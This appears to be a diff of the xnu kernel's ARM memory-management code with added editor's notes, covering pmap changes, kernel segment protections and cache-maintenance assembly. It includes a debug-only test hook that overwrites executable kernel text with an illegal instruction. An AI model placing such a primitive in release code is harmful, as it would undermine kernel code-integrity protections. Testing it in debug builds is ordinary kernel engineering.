 pmap_footprint_suspend_internal(
@@ -14869,7 +15282,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr
         * disable interrupts and preemption to avoid any unexpected memory
         * accesses.
         */
-       boolean_t old_int_state = ml_set_interrupts_enabled(false);
+       uint64_t old_int_state = pmap_interrupts_disable();
        pmap_t old_pmap = current_pmap();
        mp_disable_preemption();
        pmap_switch(pmap);
@@ -14898,7 +15311,7 @@ pmap_test_access(pmap_t pmap, vm_map_address_t va, bool should_fault, bool is_wr
 
        pmap_switch(old_pmap);
        mp_enable_preemption();
-       ml_set_interrupts_enabled(old_int_state);
+       pmap_interrupts_restore(old_int_state);
        bool retval = (took_fault == should_fault);
        return retval;
 }
@@ -15233,3 +15646,76 @@ pmap_test(void)
        return KERN_SUCCESS;
 }
 #endif /* CONFIG_XNUPOST */
+
+/*
+ * The following function should never make it to RELEASE code, since
+ * it provides a way to get the PPL to modify text pages.
+ */
+#if DEVELOPMENT || DEBUG
+
+#define ARM_UNDEFINED_INSN 0xe7f000f0
+#define ARM_UNDEFINED_INSN_THUMB 0xde00
+
+/**
+ * Forcibly overwrite executable text with an illegal instruction.
+ *
+ * @note Only used for xnu unit testing.
+ *
+ * @param pa The physical address to corrupt.
+ *
+ * @return KERN_SUCCESS on success.
+ */
+kern_return_t
+pmap_test_text_corruption(pmap_paddr_t pa)
+{
+#if XNU_MONITOR
+       return pmap_test_text_corruption_ppl(pa);
+#else /* XNU_MONITOR */
+       return pmap_test_text_corruption_internal(pa);
+#endif /* XNU_MONITOR */
+}
+
+MARK_AS_PMAP_TEXT kern_return_t
+pmap_test_text_corruption_internal(pmap_paddr_t pa)
+{
+       vm_offset_t va = phystokv(pa);
+       unsigned int pai = pa_index(pa);
+
+       assert(pa_valid(pa));
+
+       LOCK_PVH(pai);
+
+       pv_entry_t **pv_h  = pai_to_pvh(pai);
+       assert(!pvh_test_type(pv_h, PVH_TYPE_NULL));
+#if defined(PVH_FLAG_EXEC)
+       const bool need_ap_twiddle = pvh_get_flags(pv_h) & PVH_FLAG_EXEC;
+
+       if (need_ap_twiddle) {
+               pmap_set_ptov_ap(pai, AP_RWNA, FALSE);
+       }
+#endif /* defined(PVH_FLAG_EXEC) */
+
+       /*
+        * The low bit in an instruction address indicates a THUMB instruction
+        */
+       if (va & 1) {
+               va &= ~(vm_offset_t)1;
+               *(uint16_t *)va = ARM_UNDEFINED_INSN_THUMB;
+       } else {
+               *(uint32_t *)va = ARM_UNDEFINED_INSN;
+       }
+
+#if defined(PVH_FLAG_EXEC)
+       if (need_ap_twiddle) {
+               pmap_set_ptov_ap(pai, AP_RONA, FALSE);
+       }
+#endif /* defined(PVH_FLAG_EXEC) */
+
+       InvalidatePoU_IcacheRegion(va, sizeof(uint32_t));
+
+       UNLOCK_PVH(pai);
+
+       return KERN_SUCCESS;
+}
+
+#endif /* DEVELOPMENT || DEBUG */
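
Editor's note: a hypothetical caller sketch for the DEVELOPMENT/DEBUG test hook above. The choice of target symbol and the expectation that the harness catches the resulting undefined-instruction exception are assumptions; the actual xnu unit test is not part of this hunk.

/* Hypothetical usage sketch; not the actual xnu unit test. */
static kern_return_t
text_corruption_smoke_test(void)
{
	/* Resolve some executable kernel text to its physical page... */
	pmap_paddr_t pa = kvtophys((vm_offset_t)&text_corruption_smoke_test);

	/* ...and ask the PPL to plant an undefined instruction there.
	 * Any later execution of that word should take an undefined-
	 * instruction exception, which the harness must expect. */
	return pmap_test_text_corruption(pa);
}
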
index 760592fd699dd4adc37316e1444d1877cdc26035..13c58aa156f0a0a3844380149832e61a9ea45375 100644 (file)
@@ -47,6 +47,7 @@
 #include <mach/kern_return.h>
 #include <mach/machine/vm_types.h>
 #include <arm/pmap_public.h>
+#include <kern/ast.h>
 #include <mach/arm/thread_status.h>
 #if defined(__arm64__)
 #include <arm64/tlb.h>
@@ -331,7 +332,7 @@ extern pmap_paddr_t mmu_uvtop(vm_offset_t va);
 #define PMAP_GC_WAIT            2
 
 #if DEVELOPMENT || DEBUG
-#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", args); }
+#define pmap_cs_log_h(msg, args...) { if(pmap_cs_log_hacks) printf("PMAP_CS: " msg "\n", ##args); }
 #define pmap_cs_log pmap_cs_log_h
 
 #else
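
Editor's note: the one-character ##args fix above only matters when the macro is invoked without variadic arguments; plain args leaves a dangling comma in the expanded printf call, while the GCC/Clang ", ##args" extension deletes it. A stand-alone illustration (the macro below is a stand-in, not the xnu one):

/* Illustration of the GNU comma-deletion the fix relies on. */
#include <stdio.h>

#define log_bad(msg, args...)  printf("PMAP_CS: " msg "\n", args)
#define log_good(msg, args...) printf("PMAP_CS: " msg "\n", ##args)

int
main(void)
{
	log_good("attached");       /* ok: ## removes the dangling comma */
	log_good("pai %d", 42);     /* ok: expands exactly as before     */
	/* log_bad("attached"); */  /* would not compile: trailing comma */
	return 0;
}
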
@@ -461,7 +462,7 @@ extern  void pmap_gc(void);
 #if HAS_APPLE_PAC
 extern void * pmap_sign_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key);
 extern void * pmap_auth_user_ptr(void *value, ptrauth_key key, uint64_t data, uint64_t jop_key);
-#endif /* HAS_APPLE_PAC && XNU_MONITOR */
+#endif /* HAS_APPLE_PAC */
 
 /*
  * Interfaces implemented as macros.
@@ -620,10 +621,10 @@ pmap_disable_user_jop(pmap_t pmap);
 #define PMAP_LEDGER_ALLOC_INDEX 58
 #define PMAP_LEDGER_FREE_INDEX 59
 
-#if HAS_APPLE_PAC && XNU_MONITOR
+#if HAS_APPLE_PAC
 #define PMAP_SIGN_USER_PTR 60
 #define PMAP_AUTH_USER_PTR 61
-#endif /* HAS_APPLE_PAC && XNU_MONITOR */
+#endif /* HAS_APPLE_PAC */
 
 #define PHYS_ATTRIBUTE_CLEAR_RANGE_INDEX 66
 
@@ -636,8 +637,15 @@ pmap_disable_user_jop(pmap_t pmap);
 
 #define PMAP_SET_VM_MAP_CS_ENFORCED_INDEX 72
 
+#define PMAP_SET_COMPILATION_SERVICE_CDHASH_INDEX   73
+#define PMAP_MATCH_COMPILATION_SERVICE_CDHASH_INDEX 74
+
 
-#define PMAP_COUNT 74
+#if DEVELOPMENT || DEBUG
+#define PMAP_TEST_TEXT_CORRUPTION_INDEX 76
+#endif /* DEVELOPMENT || DEBUG */
+
+#define PMAP_COUNT 77
 
 #define PMAP_INVALID_CPU_NUM (~0U)
 
@@ -651,6 +659,18 @@ extern void pmap_cpu_data_init(void);
 /* Get the pmap per-CPU data for the current CPU. */
 extern pmap_cpu_data_t * pmap_get_cpu_data(void);
 
+/*
+ * For most batched page operations, we pick a sane default page count
+ * interval at which to check for pending preemption and exit the PPL if found.
+ */
+#define PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL 64
+
+inline bool
+pmap_pending_preemption(void)
+{
+       return !!(*((volatile ast_t*)ast_pending()) & AST_URGENT);
+}
+
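
Editor's note: pmap_pending_preemption() peeks at the current CPU's pending ASTs for AST_URGENT so that long, preemption-disabled PPL operations can bail out periodically, and the new interval constant suggests a batched loop that checks every 64 pages. A hedged sketch of that shape; the per-page work and resume bookkeeping are placeholders, only the check cadence mirrors the header above.

/* Sketch of a batched PPL page walk using the new helpers. */
static unsigned int
batched_page_op_sketch(unsigned int pages_left)
{
	unsigned int done = 0;

	while (pages_left > 0) {
		/* ... operate on one page ... */
		done++;
		pages_left--;

		if ((done % PMAP_DEFAULT_PREEMPTION_CHECK_PAGE_INTERVAL) == 0 &&
		    pmap_pending_preemption()) {
			/* Return early; the caller re-enters the PPL and
			 * resumes this batch once the urgent AST is handled. */
			break;
		}
	}
	return done;
}
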
 #if XNU_MONITOR
 extern boolean_t pmap_ppl_locked_down;
 
@@ -728,6 +748,10 @@ extern void CleanPoC_DcacheRegion_Force_nopreempt(vm_offset_t va, size_t length)
 #define pmap_unlock_bit(l, i)           hw_unlock_bit(l, i)
 #endif
 
+#if DEVELOPMENT || DEBUG
+extern kern_return_t pmap_test_text_corruption(pmap_paddr_t);
+#endif /* DEVELOPMENT || DEBUG */
+
 #endif /* #ifndef ASSEMBLER */
 
 #if __ARM_KERNEL_PROTECT__
index 0ebbf526bc9c96bb082c3f84d60000ab3f813752..522f7e1c0f12c34d25a260715f8508234c7fee5c 100644 (file)
 #define ARM_PTE_PNX            0x00000000             /* no privilege execute. not impl */
 #define ARM_PTE_PNX_MASK       (0<<ARM_PTE_NXSHIFT)
 
+#define ARM_PTE_XMASK          (ARM_PTE_PNX_MASK | ARM_PTE_NX_MASK)
+
 #define ARM_PTE_TEX0SHIFT      6
 #define ARM_PTE_TEX0           (1<<ARM_PTE_TEX0SHIFT)
 #define ARM_PTE_TEX0_MASK      (1<<ARM_PTE_TEX0SHIFT)
index 1787a3ce348ffe3c16a40747c3dcb725ecf46458..79b7986a507f353c5373fe4a9c476f3ee28e5b1e 100644 (file)
@@ -153,7 +153,10 @@ rtclock_init(void)
        cpu_data_t * cdp;
 
        clock_timebase_init();
-       ml_init_lock_timeout();
+
+       if (cpu_number() == master_cpu) {
+               ml_init_lock_timeout();
+       }
 
        cdp = getCpuDatap();
 
index 2c0ed7ebde2f7265221b1d82a7047333c413ce1b..8ea5feaa622b8a63db0213b444ed6934e50b6ec6 100644 (file)
 
 
 
+#define TASK_ADDITIONS_UEXC uint64_t uexc[4];
 
 #define MACHINE_TASK \
        void* task_debug; \
        TASK_ADDITIONS_PAC \
-
+\
+       TASK_ADDITIONS_UEXC
index aab4908ff4b4d5bb55184efb3aee47d075ecd525..da0e1280c4dc867daf48142f2523605ec440f0de 100644 (file)
@@ -27,6 +27,10 @@ INSTALL_KF_MD_LCL_LIST = \
        tlb.h \
        $(ARM_HEADER_FILES)
 
+# Headers installed into System.framework/PrivateHeaders
+INSTALL_MD_LCL_LIST = \
+       $(ARM_PRIVATE_HEADERS)
+
 # TODO: Is there a reason that machine_machdep.h is not in this list? If not, these lists can be consolidated.
 # Headers used to compile xnu
 EXPORT_MD_LIST = \
@@ -44,6 +48,8 @@ EXPORT_MD_LIST = \
 # These headers will be available with #include <arm64/header_file.h>
 EXPORT_MD_DIR = arm64
 
+INSTALL_MD_DIR = arm64
+
 else # $(PLATFORM),MacOSX
 
 
index fe0c6f80b307a686776fa4fb72e79171f8c61c51..0a7434b30af56dbcbd1dfd89abe828d55635ada2 100644 (file)
@@ -70,6 +70,7 @@ extern vm_offset_t   segTEXTEXECB;
 extern unsigned long segSizeLAST;
 extern unsigned long segSizeLASTDATACONST;
 extern unsigned long segSizeTEXTEXEC;
+extern unsigned long segSizeKLD;
 
 typedef struct lock_reg {
        uint32_t        reg_offset;                             // Register offset
@@ -113,12 +114,6 @@ static uint64_t lock_group_va[MAX_LOCK_GROUPS][MAX_APERTURES];
 SECURITY_READ_ONLY_LATE(bool) csr_unsafe_kernel_text = false;
 #endif
 
-#if defined(KERNEL_INTEGRITY_KTRR)
-#define CTRR_LOCK_MSR ARM64_REG_KTRR_LOCK_EL1
-#elif defined(KERNEL_INTEGRITY_CTRR)
-#define CTRR_LOCK_MSR ARM64_REG_CTRR_LOCK_EL1
-#endif
-
 /*
  * lock_group_t - describes all the parameters xnu needs to know to
  * lock down the AMCC/IOA (Lock Group) Read Only Region(s) on cold start.
@@ -411,7 +406,8 @@ rorgn_stash_range(void)
         * +------------------+-----------+-----------------------------------+
         * | Largest Address  |    LAST   | <- AMCC RO Region End (rorgn_end) |
         * +------------------+-----------+-----------------------------------+
-        * |                  | TEXT_EXEC | <- KTRR RO Region End (ctrr_end)  |
+        * |                  |    KLD    | <- KTRR RO Region End (ctrr_end)  |
+        * |                  | TEXT_EXEC |                                   |
         * +------------------+-----------+-----------------------------------+
         * |                  |    ...    |                                   |
         * +------------------+-----------+-----------------------------------+
@@ -430,7 +426,7 @@ rorgn_stash_range(void)
        assert(segSizeLAST == PAGE_SIZE);
 
        /* assert that segLAST is contiguous and just after/above/numerically higher than KTRR end */
-       assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC);
+       assert((ctrr_end + 1) == kvtophys(segTEXTEXECB) + segSizeTEXTEXEC + segSizeKLD);
 
        /* ensure that iboot and xnu agree on the amcc rorgn range */
        assert((rorgn_begin == ctrr_begin) && (rorgn_end == (ctrr_end + segSizeLASTDATACONST + segSizeLAST)));
@@ -443,6 +439,9 @@ rorgn_stash_range(void)
         * | Largest Address  |    LAST   |  <- CTRR/AMCC RO Region End  |
         * |                  |           |     (ctrr_end/rorgn_end)     |
         * +------------------+-----------+------------------------------+
+        * |                  | PPLDATA_CONST                            |
+        * |                  |  PPLTEXT  |                              |
+        * |                  |    KLD    |                              |
         * |                  | TEXT_EXEC |                              |
         * +------------------+-----------+------------------------------+
         * |                  |    ...    |                              |
@@ -468,49 +467,6 @@ rorgn_stash_range(void)
 #endif
 }
 
-#if DEVELOPMENT || DEBUG
-static void
-assert_all_lock_groups_unlocked(lock_group_t const *lock_groups)
-{
-       uint64_t reg_addr;
-       uint64_t ctrr_lock = 0;
-       bool locked = false;
-       bool write_disabled = false;;
-
-       assert(lock_groups);
-
-       for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) {
-               for (unsigned int aperture = 0; aperture < lock_groups[lg].aperture_count; aperture++) {
-#if HAS_IOA
-                       // Does the lock group define a master lock register?
-                       if (lock_groups[lg].master_lock_reg.reg_mask != 0) {
-                               reg_addr = lock_group_va[lg][aperture] + lock_groups[lg].master_lock_reg.reg_offset;
-                               locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].master_lock_reg.reg_mask) == lock_groups[lg].master_lock_reg.reg_value);
-                       }
-#endif
-                       for (unsigned int plane = 0; plane < lock_groups[lg].plane_count; plane++) {
-                               // Does the lock group define a write disable register?
-                               if (lock_groups[lg].ctrr_a.write_disable_reg.reg_mask != 0) {
-                                       reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.write_disable_reg.reg_offset;
-                                       write_disabled |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.write_disable_reg.reg_mask) == lock_groups[lg].ctrr_a.write_disable_reg.reg_value);
-                               }
-
-                               // Does the lock group define a lock register?
-                               if (lock_groups[lg].ctrr_a.lock_reg.reg_mask != 0) {
-                                       reg_addr = lock_group_va[lg][aperture] + (plane * lock_groups[lg].plane_stride) + lock_groups[lg].ctrr_a.lock_reg.reg_offset;
-                                       locked |= ((*(volatile uint32_t *)reg_addr & lock_groups[lg].ctrr_a.lock_reg.reg_mask) == lock_groups[lg].ctrr_a.lock_reg.reg_value);
-                               }
-                       }
-               }
-       }
-
-       ctrr_lock = __builtin_arm_rsr64(CTRR_LOCK_MSR);
-
-       assert(!ctrr_lock);
-       assert(!write_disabled && !locked);
-}
-#endif
-
 static void
 lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offset_t end)
 {
@@ -562,56 +518,6 @@ lock_all_lock_groups(lock_group_t const *lock_group, vm_offset_t begin, vm_offse
        }
 }
 
-static void
-lock_mmu(uint64_t begin, uint64_t end)
-{
-#if defined(KERNEL_INTEGRITY_KTRR)
-
-       __builtin_arm_wsr64(ARM64_REG_KTRR_LOWER_EL1, begin);
-       __builtin_arm_wsr64(ARM64_REG_KTRR_UPPER_EL1, end);
-       __builtin_arm_wsr64(ARM64_REG_KTRR_LOCK_EL1, 1ULL);
-
-       /* flush TLB */
-
-       __builtin_arm_isb(ISB_SY);
-       flush_mmu_tlb();
-
-#elif defined (KERNEL_INTEGRITY_CTRR)
-       /* this will lock the entire bootstrap cluster. non bootstrap clusters
-        * will be locked by respective cluster master in start.s */
-
-       __builtin_arm_wsr64(ARM64_REG_CTRR_A_LWR_EL1, begin);
-       __builtin_arm_wsr64(ARM64_REG_CTRR_A_UPR_EL1, end);
-
-#if !defined(APPLEVORTEX)
-       /* H12+ changed sequence, must invalidate TLB immediately after setting CTRR bounds */
-       __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */
-       flush_mmu_tlb();
-#endif /* !defined(APPLEVORTEX) */
-
-       __builtin_arm_wsr64(ARM64_REG_CTRR_CTL_EL1, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT);
-       __builtin_arm_wsr64(ARM64_REG_CTRR_LOCK_EL1, 1ULL);
-
-       uint64_t current_el = __builtin_arm_rsr64("CurrentEL");
-       if (current_el == PSR64_MODE_EL2) {
-               // CTRR v2 has explicit registers for cluster config. they can only be written in EL2
-
-               __builtin_arm_wsr64(ACC_CTRR_A_LWR_EL2, begin);
-               __builtin_arm_wsr64(ACC_CTRR_A_UPR_EL2, end);
-               __builtin_arm_wsr64(ACC_CTRR_CTL_EL2, CTRR_CTL_EL1_A_PXN | CTRR_CTL_EL1_A_MMUON_WRPROTECT);
-               __builtin_arm_wsr64(ACC_CTRR_LOCK_EL2, 1ULL);
-       }
-
-       __builtin_arm_isb(ISB_SY); /* ensure all prior MSRs are complete */
-#if defined(APPLEVORTEX)
-       flush_mmu_tlb();
-#endif /* defined(APPLEVORTEX) */
-
-#else /* defined(KERNEL_INTEGRITY_KTRR) */
-#error KERNEL_INTEGRITY config error
-#endif /* defined(KERNEL_INTEGRITY_KTRR) */
-}
-
 #if DEVELOPMENT || DEBUG
 static void
 assert_amcc_cache_disabled(lock_group_t const *lock_group)
@@ -662,8 +568,6 @@ rorgn_lockdown(void)
                lock_group_t const * const lock_group = find_lock_group_data();
 
 #if DEVELOPMENT || DEBUG
-               assert_all_lock_groups_unlocked(lock_group);
-
                printf("RO Region Begin: %p End: %p\n", (void *)rorgn_begin, (void *)rorgn_end);
                printf("CTRR (MMU) Begin: %p End: %p, setting lockdown\n", (void *)ctrr_begin, (void *)ctrr_end);
 
@@ -673,14 +577,6 @@ rorgn_lockdown(void)
                // Lock the AMCC/IOA PIO lock registers.
                lock_all_lock_groups(lock_group, phystokv(rorgn_begin), phystokv(rorgn_end));
 
-               /*
-                * KTRR/CTRR registers are inclusive of the smallest page size granule supported by processor MMU
-                * rather than the actual page size in use. Load the last byte of the end page, and let the HW
-                * truncate per the smallest page granule supported. Must use same treament in start.s for warm
-                * start of APs.
-                */
-               lock_mmu(ctrr_begin, ctrr_end);
-
                // Unmap and free PIO VA space needed to lockdown the lock groups.
                for (unsigned int lg = 0; lg < MAX_LOCK_GROUPS; lg++) {
                        for (unsigned int aperture = 0; aperture < lock_group[lg].aperture_count; aperture++) {
index 10c0a455eb55ada3fd983b298975e379acf1beb7..728ee8c27bf31f60189373796dc9c9f16508114c 100644 (file)
@@ -258,7 +258,9 @@ SECURITY_READ_ONLY_LATE(vm_offset_t)          segLINKB;
 SECURITY_READ_ONLY_LATE(static unsigned long) segSizeLINK;
 
 SECURITY_READ_ONLY_LATE(static vm_offset_t)   segKLDB;
-SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLD;
+SECURITY_READ_ONLY_LATE(unsigned long)        segSizeKLD;
+SECURITY_READ_ONLY_LATE(static vm_offset_t)   segKLDDATAB;
+SECURITY_READ_ONLY_LATE(static unsigned long) segSizeKLDDATA;
 SECURITY_READ_ONLY_LATE(vm_offset_t)          segLASTB;
 SECURITY_READ_ONLY_LATE(unsigned long)        segSizeLAST;
 SECURITY_READ_ONLY_LATE(vm_offset_t)          segLASTDATACONSTB;
@@ -1338,6 +1340,7 @@ noAuxKC:
        arm_vm_page_granular_RNX((vm_offset_t)&excepstack_high_guard, PAGE_MAX_SIZE, 0);
 
        arm_vm_page_granular_ROX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT);
+       arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT);
        arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT);
        arm_vm_page_granular_RWNX(segPLKLINKEDITB, segSizePLKLINKEDIT, ARM64_GRANULE_ALLOW_BLOCK | ARM64_GRANULE_ALLOW_HINT); // Coalesced kext LINKEDIT segment
        arm_vm_page_granular_ROX(segLASTB, segSizeLAST, ARM64_GRANULE_ALLOW_BLOCK); // __LAST may be empty, but we cannot assume this
@@ -1433,8 +1436,12 @@ arm_vm_physmap_init(boot_args *args)
        // Slid region between gPhysBase and beginning of protected text
        arm_vm_physmap_slide(temp_ptov_table, gVirtBase, segLOWEST - gVirtBase, AP_RWNA, 0);
 
-       // kext bootstrap segment
+       // kext bootstrap segments
+#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR)
+       /* __KLD,__text is covered by the rorgn */
        arm_vm_physmap_slide(temp_ptov_table, segKLDB, segSizeKLD, AP_RONA, 0);
+#endif
+       arm_vm_physmap_slide(temp_ptov_table, segKLDDATAB, segSizeKLDDATA, AP_RONA, 0);
 
        // Early-boot data
        arm_vm_physmap_slide(temp_ptov_table, segBOOTDATAB, segSizeBOOTDATA, AP_RONA, 0);
@@ -1551,10 +1558,17 @@ arm_vm_prot_finalize(boot_args * args __unused)
 #endif /* __ARM_KERNEL_PROTECT__ */
 
 #if XNU_MONITOR
+#if !defined(KERNEL_INTEGRITY_KTRR) && !defined(KERNEL_INTEGRITY_CTRR)
+       /* __KLD,__text is covered by the rorgn */
        for (vm_offset_t va = segKLDB; va < (segKLDB + segSizeKLD); va += ARM_PGBYTES) {
                pt_entry_t *pte = arm_kva_to_pte(va);
                *pte = ARM_PTE_EMPTY;
        }
+#endif
+       for (vm_offset_t va = segKLDDATAB; va < (segKLDDATAB + segSizeKLDDATA); va += ARM_PGBYTES) {
+               pt_entry_t *pte = arm_kva_to_pte(va);
+               *pte = ARM_PTE_EMPTY;
+       }
        /* Clear the original stack mappings; these pages should be mapped through ptov_table. */
        for (vm_offset_t va = segBOOTDATAB; va < (segBOOTDATAB + segSizeBOOTDATA); va += ARM_PGBYTES) {
                pt_entry_t *pte = arm_kva_to_pte(va);
@@ -1589,6 +1603,11 @@ arm_vm_prot_finalize(boot_args * args __unused)
                arm_vm_page_granular_RNX(segLASTDATACONSTB, segSizeLASTDATACONST, ARM64_GRANULE_ALLOW_BLOCK);
        }
 
+       /*
+        * __KLD,__text should no longer be executable.
+        */
+       arm_vm_page_granular_RNX(segKLDB, segSizeKLD, ARM64_GRANULE_ALLOW_BLOCK);
+
        /*
         * Must wait until all other region permissions are set before locking down DATA_CONST
         * as the kernel static page tables live in DATA_CONST on KTRR enabled systems
@@ -1860,6 +1879,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args)
        segBOOTDATAB     = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__BOOTDATA", &segSizeBOOTDATA);
        segLINKB         = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK);
        segKLDB          = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD);
+       segKLDDATAB      = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA);
        segPRELINKDATAB  = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_DATA", &segSizePRELINKDATA);
        segPRELINKINFOB  = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_INFO", &segSizePRELINKINFO);
        segPLKLLVMCOVB   = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PLK_LLVM_COV", &segSizePLKLLVMCOV);
@@ -1877,7 +1897,10 @@ arm_vm_init(uint64_t memory_size, boot_args * args)
                // fileset has kext PLK_TEXT_EXEC under kernel collection TEXT_EXEC following kernel's LAST
                segKCTEXTEXECB = (vm_offset_t) getsegdatafromheader(kc_mh,             "__TEXT_EXEC", &segSizeKCTEXTEXEC);
                assert(segPLKTEXTEXECB && !segSizePLKTEXTEXEC);                        // kernel PLK_TEXT_EXEC must be empty
-               assert(segLASTB && segSizeLAST);                                       // kernel LAST must not be empty
+
+               assert(segLASTB);                                                      // kernel LAST can be empty, but it must have
+                                                                                      // a valid address for computations below.
+
                assert(segKCTEXTEXECB <= segLASTB);                                    // KC TEXT_EXEC must contain kernel LAST
                assert(segKCTEXTEXECB + segSizeKCTEXTEXEC >= segLASTB + segSizeLAST);
                segPLKTEXTEXECB = segLASTB + segSizeLAST;
index e4ac467e5ff466ee22a8a67a1067e313edab6960..3cee5ff33dfd6ececc3909d9afd9bd366a5813f0 100644 (file)
@@ -34,7 +34,6 @@
 #include <mach/mach_traps.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <arm/cpu_data_internal.h>
 #include <kern/mach_param.h>
@@ -164,7 +163,7 @@ dtrace_get_cpu_int_stack_top(void)
        return getCpuDatap()->intstack_top;
 }
 #endif /* CONFIG_DTRACE */
-extern const char *mach_syscall_name_table[];
+extern const char *const mach_syscall_name_table[];
 
 /* ARM64_TODO: remove this. still TODO?*/
 extern struct proc* current_proc(void);
index 958bc1936ae3c45ab5d64d355cce888b12a68f27..00760c9352635fcf92cce207ab243a0be9a4206f 100644 (file)
@@ -28,6 +28,7 @@
 
 #include <machine/asm.h>
 #include <arm64/proc_reg.h>
+#include <pexpert/arm64/board_config.h>
 #include <arm/pmap.h>
 #include <sys/errno.h>
 #include "assym.s"
@@ -126,16 +127,50 @@ L_ipui_done:
 .endmacro
 
 /*
- *     Detects the presence of an L2 cache and returns 1 if implemented,
- *     zero otherwise.
- *
+ * Returns the cache configuration for the specified level
  *     $0: Output register
+ *     $1: Cache level register
+ *     $2: Scratch register
  */
-.macro HAS_L2_CACHE
+.macro CACHE_AT_LEVEL
        mrs             $0, CLIDR_EL1
-       ubfx    $0, $0, #3, #3                                          // extract L2 cache Ctype
-       cmp             $0, #0x1
-       cset    $0, hi
+       add             $2, $1, $1, lsl #1
+       lsr             $0, $0, $2
+       and             $0, $0, #7                                      // extract cache type
+.endmacro
+
+/*
+ * Perform set/way maintenance to the desired cache level
+ *     $0: 'dc' set/way variant, e.g. csw or cisw
+ *     x0: maximum cache level, 0-based, inclusive
+ */
+.macro DCACHE_SET_WAY
+       dmb             sy
+       mov             x1, #0
+1:
+       CACHE_AT_LEVEL x2, x1, x3
+       cbz             x2, 5f                  // No cache at this level, all higher levels may be skipped
+       cmp             x2, #2
+       b.lt            4f                      // No data cache at this level, skip to next level
+       mov             x2, x1
+       GET_CACHE_CONFIG x2, x9, x10, x11
+       lsl             x2, x1, #1              // level field for cisw/csw, bits 1:3
+2:
+3:
+       dc              $0, x2                  // clean dcache line by way/set
+       add             x2, x2, x9              // increment set index
+       tst             x2, x10                 // look for overflow
+       b.eq            3b
+       bic             x2, x2, x10             // clear set overflow
+       adds            w2, w2, w11             // increment way
+       b.cc            2b                      // loop
+       dsb             sy                      // ensure completion of prior level maintenance
+4:
+       add             x1, x1, #1
+       cmp             x1, x0
+       b.ls            1b                      // next level
+5:
+       ret
 .endmacro
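
Editor's note: DCACHE_SET_WAY generalizes the old fixed L1/L2 loops; it walks CLIDR_EL1 level by level up to the level passed in x0 (LoC or LoUIS, as extracted by the callers below) and issues dc csw/cisw across every set and way of each data or unified cache. The following is a hedged C rendering of the same walk using the canonical ARMv8 set/way algorithm; it is illustrative only, and the kernel derives its increments via GET_CACHE_CONFIG instead.

/* Hedged C rendering of the set/way walk (clean variant, "dc csw"). */
#include <stdint.h>

static inline uint64_t read_clidr(void)  { uint64_t v; __asm__ volatile("mrs %0, CLIDR_EL1"  : "=r"(v)); return v; }
static inline uint64_t read_ccsidr(void) { uint64_t v; __asm__ volatile("mrs %0, CCSIDR_EL1" : "=r"(v)); return v; }

static void
dcache_clean_by_set_way(unsigned int max_level /* 0-based, inclusive */)
{
	uint64_t clidr = read_clidr();

	__asm__ volatile("dmb sy" ::: "memory");
	for (unsigned int level = 0; level <= max_level; level++) {
		unsigned int ctype = (clidr >> (3 * level)) & 0x7;
		if (ctype == 0) {
			break;          /* no cache at this level or above */
		}
		if (ctype < 2) {
			continue;       /* instruction-only cache: skip    */
		}
		/* Select this level's data/unified cache, read its geometry. */
		__asm__ volatile("msr CSSELR_EL1, %0; isb" :: "r"((uint64_t)level << 1));
		uint64_t ccsidr = read_ccsidr();
		unsigned int line_shift = (ccsidr & 0x7) + 4;            /* log2(line bytes) */
		unsigned int ways       = ((ccsidr >> 3) & 0x3ff) + 1;
		unsigned int sets       = ((ccsidr >> 13) & 0x7fff) + 1;
		unsigned int way_shift  = __builtin_clz(ways > 1 ? ways - 1 : 1);

		for (unsigned int way = 0; way < ways; way++) {
			for (unsigned int set = 0; set < sets; set++) {
				uint64_t sw = ((uint64_t)way << way_shift) |
				    ((uint64_t)set << line_shift) | (level << 1);
				__asm__ volatile("dc csw, %0" :: "r"(sw));
			}
		}
		__asm__ volatile("dsb sy" ::: "memory");
	}
}
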
 
 /*
@@ -149,43 +184,14 @@ L_ipui_done:
        .globl EXT(clean_mmu_dcache)
 LEXT(CleanPoC_Dcache)
 #if  defined(APPLE_ARM64_ARCH_FAMILY)
+       dsb             sy
+       ret
        /* "Fully Coherent." */
 #else /* !defined(APPLE_ARM64_ARCH_FAMILY) */
-       mov             x0, #0
-       GET_CACHE_CONFIG x0, x9, x10, x11
-
-       dmb             sy
-       mov             x0, #0
-L_cpcd_dcacheway:
-L_cpcd_dcacheline:
-       dc              csw, x0                                                         // clean dcache line by way/set
-       add             x0, x0, x9                                                      // increment set index
-       tst             x0, x10                                                         // look for overflow
-       b.eq    L_cpcd_dcacheline
-       bic             x0, x0, x10                                                     // clear set overflow
-       adds    w0, w0, w11                                                     // increment way
